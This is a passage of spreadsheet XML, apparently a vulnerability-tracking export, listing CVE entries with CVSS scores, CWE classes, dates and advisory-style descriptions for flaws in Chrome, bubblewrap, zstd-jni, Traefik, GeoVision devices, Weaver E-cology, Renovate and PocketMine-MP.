      </c>
      <c r="E1068" s="5" t="inlineStr"/>
      <c r="F1068" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1068" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87612</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87617</t>
        </is>
      </c>
      <c r="C1069" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1069" s="5" t="inlineStr"/>
      <c r="F1069" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1069" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87617</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87625</t>
        </is>
      </c>
      <c r="C1070" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1070" s="5" t="inlineStr"/>
      <c r="F1070" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1070" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87625</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87636</t>
        </is>
      </c>
      <c r="C1071" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1071" s="5" t="inlineStr"/>
      <c r="F1071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1071" s="5" t="inlineStr">
        <is>
          <t>Type confusion in XML in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87636</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87766</t>
        </is>
      </c>
      <c r="C1072" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1072" s="5" t="inlineStr"/>
      <c r="F1072" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="inlineStr"/>
      <c r="I1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1072" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in bubblewrap. During sandbox setup, creating files or directories under the new root can follow a parent symlink onto the host via /oldroot, writing attacker-chosen paths outside the sandbox as the launching user. This happens before the sandboxed process starts. This issue is GHSA-pxhw-h44j-8pfx. It is fixed in bubblewrap 0.12.0.</t>
        </is>
      </c>
      <c r="M1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87766</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87795</t>
        </is>
      </c>
      <c r="C1073" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1073" s="5" t="inlineStr"/>
      <c r="F1073" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="inlineStr"/>
      <c r="I1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1073" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate offset and length parameters in the ZstdDictCompress constructor, allowing out-of-bounds memory reads. Attackers can supply untrusted offset or length values to read native heap memory into the compression dictionary, typically causing JVM crashes.</t>
        </is>
      </c>
      <c r="M1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87795</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87823</t>
        </is>
      </c>
      <c r="C1074" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1074" s="5" t="inlineStr"/>
      <c r="F1074" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="inlineStr"/>
      <c r="I1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1074" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 performs 32-bit signed bounds checks on three direct-ByteBuffer frame-size native methods, allowing out-of-bounds memory reads via negative or overflowing offsets. Attackers can supply negative offset values near Integer.MIN_VALUE to read unmapped memory, causing JVM termination or extracting arbitrary frame size data from unintended memory locations.</t>
        </is>
      </c>
      <c r="M1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87823</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87927</t>
        </is>
      </c>
      <c r="C1075" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1075" s="5" t="inlineStr"/>
      <c r="F1075" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="inlineStr"/>
      <c r="I1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="L1075" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 contains a local file inclusion vulnerability in the ajax and require-maxsite dispatchers that allows unauthenticated attackers to execute privileged handler files by supplying base64-encoded path traversal sequences. Attackers can bypass path validation checks and execute admin-gated handler actions without authentication to access sensitive functionality.</t>
        </is>
      </c>
      <c r="M1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87927</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88009</t>
        </is>
      </c>
      <c r="C1076" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1076" s="5" t="inlineStr"/>
      <c r="F1076" s="5" t="inlineStr"/>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="inlineStr"/>
      <c r="I1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-444</t>
        </is>
      </c>
      <c r="L1076" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. Prior to 2.11.57, and 3.7.13, Traefik accepts a rootless HTTP/1 request target that Go stores in URL.Opaque while leaving URL.Path empty. The rewriteRequestBuilder path evaluates routing, path sanitization, forwardAuth, encodedCharacters, and access logging against a path normalized to / but forwards URL.Opaque verbatim to the backend, allowing cross-vhost routing bypass, path-scoped authorization bypass, and access-log evasion when the backend interprets the opaque target as a path. This issue is fixed in 2.11.57 and 3.7.13.</t>
        </is>
      </c>
      <c r="M1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88009</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88271</t>
        </is>
      </c>
      <c r="C1077" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1077" s="5" t="inlineStr"/>
      <c r="F1077" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="inlineStr"/>
      <c r="I1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1077" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows a Guest user to overwrite device configuration and replace the administrator password through SSVR.</t>
        </is>
      </c>
      <c r="M1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88271</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88277</t>
        </is>
      </c>
      <c r="C1078" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1078" s="5" t="inlineStr"/>
      <c r="F1078" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="inlineStr"/>
      <c r="I1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1078" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an authenticated ONVIF user to inject shell commands through ConsumerReference.Address and execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88277</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89046</t>
        </is>
      </c>
      <c r="C1079" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1079" s="5" t="inlineStr"/>
      <c r="F1079" s="5" t="inlineStr"/>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="inlineStr"/>
      <c r="I1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1079" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions 1.5.5-6 through 1.5.7-13 contain an out-of-bounds read vulnerability in Zstd.getFrameContentSize that fails to validate negative srcPosition arguments. Attackers can supply negative offset values that bypass bounds checks and reach the native frame-header parser, causing out-of-bounds memory reads that lead to information disclosure or JVM crashes.</t>
        </is>
      </c>
      <c r="M1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89046</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-20097</t>
        </is>
      </c>
      <c r="C1080" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1080" s="5" t="inlineStr"/>
      <c r="F1080" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="inlineStr"/>
      <c r="I1080" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1080" s="5" t="inlineStr">
        <is>
          <t>Weaver (Fanwei) E-cology 8.0 contains a SQL injection vulnerability in the SignatureDownLoad servlet that allows unauthenticated remote attackers to read arbitrary files by injecting a UNION SELECT payload into the markId GET parameter, which is concatenated unsanitized into a SQL query. Attackers can control the markPath value returned by the query to supply an attacker-controlled filesystem path, causing the servlet to read and stream back arbitrary files accessible to the application server process, including sensitive configuration files containing database credentials. Disclosure materials indicate that this vulnerability has been remediated, but it's unclear which version resolved the issue. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-20097</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25765</t>
        </is>
      </c>
      <c r="C1081" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1081" s="5" t="inlineStr"/>
      <c r="F1081" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="inlineStr"/>
      <c r="I1081" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1081" s="5" t="inlineStr">
        <is>
          <t>ASP-CMS contains a SQL injection vulnerability in the commentList.asp endpoint that allows unauthenticated remote attackers to inject arbitrary SQL by manipulating the id parameter in GET requests to the comment listing script. Attackers can bypass the application's keyword blocklist by interleaving the string 'master' within blocked SQL terms to extract sensitive database contents. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25765</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25766</t>
        </is>
      </c>
      <c r="C1082" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1082" s="5" t="inlineStr"/>
      <c r="F1082" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="inlineStr"/>
      <c r="I1082" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1082" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;= 13.87.0 and &lt;= 19.38.6 leak temporary repository tokens into pull request comments during certain Go Modules update failure scenarios. The issue is fixed in version 19.38.7. Anyone able to view the affected pull request comments could obtain the exposed tokens.</t>
        </is>
      </c>
      <c r="M1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25766</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37267</t>
        </is>
      </c>
      <c r="C1083" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1083" s="5" t="inlineStr"/>
      <c r="F1083" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1083" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1083" s="5" t="inlineStr"/>
      <c r="I1083" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1083" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=19.180.0 and &lt;23.25.1, when used with Azure DevOps, may expose the bot's authorization token in server or pipeline logs because the git http.extraheader=AUTHORIZATION parameter is logged without redaction. Anyone with access to saved logs could obtain the bot credentials. Fixed in 23.25.1; Azure DevOps users should revoke and regenerate credentials if logs may have been exposed.</t>
        </is>
      </c>
      <c r="M1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37267</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-50997</t>
        </is>
      </c>
      <c r="C1084" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1084" s="5" t="inlineStr"/>
      <c r="F1084" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1084" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1084" s="5" t="inlineStr"/>
      <c r="I1084" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1084" s="5" t="inlineStr">
        <is>
          <t>Weaver (Fanwei) E-cology 8.0 and 9.0 contains a SQL injection vulnerability in the HrmCareerApplyPerView.jsp endpoint that allows unauthenticated remote attackers to extract arbitrary data from the backend database by manipulating the id GET parameter. Attackers can send a single crafted GET request with UNION-based injection payloads through the unsanitized id parameter to retrieve arbitrary data from the Microsoft SQL Server backend. This vulnerability is potentially remediated in software version 10.53 or 10.54. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-50997</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51009</t>
        </is>
      </c>
      <c r="C1085" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1085" s="5" t="inlineStr"/>
      <c r="F1085" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="inlineStr"/>
      <c r="I1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1085" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.7.2 fails to properly handle exceptions from the adhocore/json-comment library when parsing skin geometry data. Attackers can send login or skin packets with invalid geometry JSON to trigger an unhandled RuntimeException, causing server crash.</t>
        </is>
      </c>
      <c r="M1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51009</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51017</t>
        </is>
      </c>
      <c r="C1086" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1086" s="5" t="inlineStr"/>
      <c r="F1086" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="inlineStr"/>
      <c r="I1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1086" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.26.5 and 4.0.5 fail to validate the length of skin data fields submitted by players, allowing uncapped values to exceed the 32767 byte TAG_String limit. Attackers can submit oversized skin data fields like skinID or geometryName to trigger exceptions during NBT data serialization, causing server crashes.</t>
        </is>
      </c>
      <c r="M1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51017</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54355</t>
        </is>
      </c>
      <c r="C1087" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1087" s="5" t="inlineStr"/>
      <c r="F1087" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="inlineStr"/>
      <c r="I1087" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1087" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 fail to validate that the identityPublicKey in LoginPacket uses the required secp384r1 elliptic curve. Attackers can provide LoginPackets with keys using different curves or non-EC key types to pass login verification but trigger an uncaught exception during ECDH key derivation, crashing the server.</t>
        </is>
      </c>
      <c r="M1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54355</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54390</t>
        </is>
      </c>
      <c r="C1088" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1088" s="5" t="inlineStr"/>
      <c r="F1088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="inlineStr"/>
      <c r="I1088" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="L1088" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper null value handling in arrays. Attackers can send malformed JSON with unexpected null elements in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="M1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54390</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54393</t>
        </is>
      </c>
      <c r="C1089" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1089" s="5" t="inlineStr"/>
      <c r="F1089" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="inlineStr"/>
      <c r="I1089" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1089" s="5" t="inlineStr"/>
      <c r="K1089" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1089" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.20.5 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper validation in the JsonMapper dependency. Attackers can send malformed JSON structures in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="M1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54393</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
